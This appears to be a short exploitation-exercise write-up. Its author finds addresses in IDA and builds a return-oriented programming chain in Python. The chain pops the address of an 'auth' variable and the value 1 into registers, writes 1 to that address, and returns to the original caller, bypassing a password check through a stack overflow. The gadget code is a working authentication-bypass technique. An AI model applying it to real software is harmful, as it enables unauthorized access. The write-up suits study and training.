I looked for the addresses of auth and ra of check password using IDA, for auth I just double clicked on its name, for ra I looked what is the address just after the call to check password.

then, I wanted to put my shellcode in : 
    
    equals : MOV eax, auth_address
    ##########################################
    POP_eax = struct.pack('<I', search.find('POP eax'))
    auth_address = struct.pack('<I', addresses.AUTH)


    equals : MOV edx, 0x1
    ##########################################
    POP_edx = struct.pack('<I', search.find('POP edx'))
    one_value = struct.pack('<I', 0x00000001)


    equals : MOV [eax], edx
    ##########################################
    MOV = struct.pack('<I', search.find('MOV [eax], edx'))
    
    
    original_ra = struct.pack('<I', 0x080488b0)

putting it all together will run over the return address and will jump to the auth address, will put 0x1 there, and then will jump back to the original return address.
